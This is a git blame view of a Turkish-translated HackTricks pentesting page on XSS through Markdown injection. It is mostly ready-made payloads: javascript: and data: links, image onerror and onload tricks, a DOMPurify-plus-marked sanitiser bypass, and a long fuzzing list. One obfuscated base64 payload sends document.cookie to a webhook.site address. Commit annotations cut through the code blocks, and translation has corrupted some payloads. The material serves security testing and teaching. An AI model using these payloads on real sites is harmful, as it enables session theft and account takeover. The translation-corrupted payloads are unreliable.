Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-18 15:08:29 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md

189 lines
14 KiB
Markdown
Raw Normal View History

Translated to Turkish
2024-02-10 18:14:16 +00:00
# Markdown'de XSS
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
GitBook: [#3594] No subject
2022-10-11 12:43:12 +00:00
<details>
Translated to Turkish
2024-02-10 18:14:16 +00:00
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
GitBook: [#3594] No subject
2022-10-11 12:43:12 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da beni takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)'ya PR göndererek paylaşın**.
GitBook: [#3594] No subject
2022-10-11 12:43:12 +00:00
</details>
Translated to Turkish
2024-02-10 18:14:16 +00:00
Eğer markdown'e kod enjekte etme şansınız varsa, kod yorumlandığında XSS tetiklemek için kullanabileceğiniz birkaç seçenek vardır.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
### HTML etiketleri
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Markdown'de XSS elde etmenin en yaygın yolu, javascript'i çalıştıran yaygın HTML etiketlerini enjekte etmektir, çünkü birçok markdown yorumlayıcısı da HTML'i kabul eder.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```html
<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />
```
Translated to Turkish
2024-02-10 18:14:16 +00:00
[Ana XSS sayfasında](./) daha fazla örnek bulabilirsiniz.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
### Javascript bağlantıları
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Eğer HTML etiketleri bir seçenek değilse, her zaman markdown sözdizimiyle oynamayı deneyebilirsiniz:
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```html
<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie))
<!-- Other links attacks with some bypasses -->
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```
Translated to Turkish
2024-02-10 18:14:16 +00:00
### Img etkinlik sözdizimi kötüye kullanımı
Bir diğer XSS saldırı tekniği, `<img>` etiketinin `onerror` veya `onload` olaylarına kötü amaçlı JavaScript kodu enjekte etmektir. Bu, bir resim yüklenirken veya yüklenemediğinde tetiklenen olaylardır. Saldırgan, bu olayları kullanarak kullanıcının tarayıcısında istediği kodu çalıştırabilir.
Bu saldırıyı gerçekleştirmek için, saldırgan bir `<img>` etiketi oluşturur ve `src` özelliğine hedeflenen web sitesindeki bir resmin URL'sini ekler. Ardından, `onerror` veya `onload` olaylarına JavaScript kodunu ekler. Bu kod, saldırganın istediği işlemleri gerçekleştirebilir, örneğin kullanıcının oturum açmasını sağlayabilir veya kullanıcının tarayıcısında kötü amaçlı bir betik çalıştırabilir.
Örnek:
```html
<img src="https://example.com/image.jpg" onerror="alert('XSS Attack!');" />
```
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Bu örnekte, `onerror` olayı tetiklendiğinde `alert('XSS Attack!');` kodu çalıştırılır ve kullanıcıya bir XSS saldırısı olduğunu bildiren bir ileti görüntülenir.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Bu tür saldırılardan korunmak için, giriş doğrulama ve çıktı kodlama gibi güvenlik önlemleri almak önemlidir. Ayrıca, kullanıcı girişlerini güvenli bir şekilde işlemek ve tarayıcı tarafında çalışan betikleri sınırlamak da önemlidir.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```markdown
![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
```
### HTML Sanitiser Markdown Bypass
Translated to Turkish
2024-02-10 18:14:16 +00:00
Aşağıdaki kod, HTML girişini temizliyor ve ardından markdown ayrıştırıcısına geçiriyor, böylece Markdown ve DOMPurify arasındaki yanlış yorumlamaları istismar ederek XSS tetiklenebilir.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```html
a
2024-02-07 05:05:50 +01:00
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
Translated to Turkish
2024-02-10 18:14:16 +00:00
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
}
</script>
```
Translated to Turkish
2024-02-10 18:14:16 +00:00
Örnek payloadlar:
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```html
<div id="1
![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
<a title="a
<img src=x onerror=alert(1)>">yep</a>
------------------------------------------------
[x](y '<style>')<!--</style><div id="x--><img src=1 onerror=alert(1)>"></div>
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#'></p>)
----------------------------------------------
GitBook: [#3216] No subject
2022-05-18 23:05:43 +00:00
`<p x="`<img src=x onerror=alert(1)>"></p>
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```
### Fuzzing
Translated to Turkish
2024-02-10 18:14:16 +00:00
Fuzzing, veya diğer adıyla bozma testi, bir uygulamanın hatalarını bulmak için otomatik olarak girişlere rastgele veya özel olarak oluşturulmuş verileri beslemek için kullanılan bir tekniktir. Bu teknik, uygulamanın beklenmedik girişlere nasıl tepki verdiğini test etmek için kullanılır ve potansiyel güvenlik açıklarını ortaya çıkarmak için etkili bir yöntemdir.
Fuzzing, birçok farklı türde gerçekleştirilebilir. Örneğin, basit bir fuzzing saldırısı, uygulamaya rastgele karakterler veya sayılar içeren girişler göndermektir. Bu, uygulamanın beklenmedik girişlere nasıl tepki verdiğini test etmek için kullanılır.
Daha gelişmiş bir fuzzing saldırısı, uygulamanın belirli bir veri yapısını kabul etmesi gerektiği durumlarda kullanılabilir. Örneğin, bir web formu, belirli bir e-posta formatını kabul etmelidir. Fuzzing, bu formun beklenmedik girişlere nasıl tepki verdiğini test etmek için farklı e-posta formatlarını denemek için kullanılabilir.
Fuzzing, bir uygulamanın güvenlik açıklarını bulmak için etkili bir yöntemdir, çünkü uygulamanın beklenmedik girişlere nasıl tepki verdiğini test eder. Bu, potansiyel güvenlik açıklarını ortaya çıkarabilir ve saldırganların uygulamayı kötüye kullanmasını engellemek için bu açıkları düzeltmek için gerekli önlemleri almanıza yardımcı olabilir.
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
```html
Translated to Turkish
2024-02-10 18:14:16 +00:00
<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
Translated to Turkish
2024-02-10 18:14:16 +00:00
_http://danlec_@.1 stil=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1&#41;)
[a](javascript&#58this;alert(1&#41;)
[a](Javas&#99;ript:alert(1&#41;)
[a](Javas%26%2399;ript:alert(1&#41;)
[a](javascript:alert&#65534;(1&#41;)
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a](javascript:alert(document.domain&#41;)
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
</http://<?php\><\h1\><script:script>confirm(2)
[XSS](.alert(1);)
Translated to Turkish
2024-02-10 18:14:16 +00:00
[ ](https://a.de?p=[[/data-x=. stil=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
[ ](http://a?p=[[/onclick=alert(0) .]])
[a](javascript:new%20Function`al\ert\`1\``;)
[XSS](javascript:prompt(document.cookie))
Translated to Turkish
2024-02-10 18:14:16 +00:00
[X
[XSS](&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;)
GitBook: [#3180] No subject
2022-05-05 23:53:10 +00:00
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1&#41;)
[XSS](javascript&#58this;alert(1&#41;)
[XSS](Javas&#99;ript:alert(1&#41;)
[XSS](Javas%26%2399;ript:alert(1&#41;)
[XSS](javascript:alert&#65534;(1&#41;)
[XSS](javascript:confirm(1)
[XSS](javascript://www.google.com%0Aprompt(1))
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
[XSS](<EFBFBD>javascript:alert(document.domain&#41;)
![XSS](javascript:prompt(document.cookie))\
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
![XSS'"`onerror=prompt(document.cookie)](x)\
```
GitBook: [#3594] No subject
2022-10-11 12:43:12 +00:00
<details>
Translated to Turkish
2024-02-10 18:14:16 +00:00
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
GitBook: [#3594] No subject
2022-10-11 12:43:12 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
* Bir **cybersecurity şirketinde mi çalışıyorsunuz**? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da beni takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)'ya PR göndererek paylaşın**.
GitBook: [#3594] No subject
2022-10-11 12:43:12 +00:00
</details>
Reference in a new issue Copy permalink